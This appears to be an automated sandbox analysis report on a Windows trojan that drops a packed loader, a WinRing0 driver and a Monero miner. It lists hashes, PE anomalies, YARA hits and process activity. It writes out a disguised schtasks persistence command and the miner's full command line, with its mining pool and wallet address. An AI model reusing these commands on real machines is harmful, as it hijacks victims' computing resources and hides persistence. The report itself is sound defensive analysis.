Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
PE / OLE file has an invalid certificate
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: pg2bsuqa.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: cpu.exe.6.dr Static PE information: Number of sections : 13 > 10
PE file contains strange resources
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pg2bsuqa.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Section: ZLIB complexity 0.989800347222
Source: WinRing0x64.sys.6.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@13/9@9/5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\pg2bsuqa.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Mutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe ReversingLabs: Detection: 28%
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe'
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\pg2bsuqa.exe 'C:\Users\user\AppData\Local\pg2bsuqa.exe' Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process created: C:\Users\user\AppData\Local\zmql3v0y.exe 'C:\Users\user\AppData\Local\zmql3v0y.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32 Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static file information: File size 2817248 > 1048576
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x2a7200
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Unpacked PE file: 0.2.SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe.2e0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Unpacked PE file: 6.2.zmql3v0y.exe.b30000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Unpacked PE file: 15.2.RantimeBroker.exe.d80000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
Binary contains a suspicious time stamp
Source: initial sample Static PE information: 0xEEB543EE [Tue Nov 27 12:13:34 2096 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: zmql3v0y.exe.0.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: real checksum: 0x2b2b3a should be: 0x2b9e3b
Source: RantimeBroker.exe.6.dr Static PE information: real checksum: 0x280d9c should be: 0x285c9a
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name: .themida
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk0
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .themida
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .boot
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk1
Source: pg2bsuqa.exe.0.dr Static PE information: section name: .apk2
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name: .themida
Source: zmql3v0y.exe.0.dr Static PE information: section name: .boot
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name: .themida
Source: RantimeBroker.exe.6.dr Static PE information: section name: .boot
Source: cpu.exe.6.dr Static PE information: section name: _RANDOMX
Source: cpu.exe.6.dr Static PE information: section name: _SHA3_25
Source: cpu.exe.6.dr Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr Static PE information: section name: _TEXT_CN
Source: cpu.exe.6.dr Static PE information: section name: _RDATA
Source: cpu.exe.6.dr Static PE information: section name: 0
Source: cpu.exe.6.dr Static PE information: section name: 1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D8570 push ecx; ret 4_2_003D8585
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Code function: 15_2_03CA0007 push es; retf 0003h 15_2_03CA001E
Source: initial sample Static PE information: section name: entropy: 7.58163620158
Source: initial sample Static PE information: section name: entropy: 7.89210158409
Source: initial sample Static PE information: section name: entropy: 7.89210158409

Persistence and Installation Behavior:

barindex
Sample is not signed and drops a device driver
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to behavior
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\zmql3v0y.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\pg2bsuqa.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Jump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
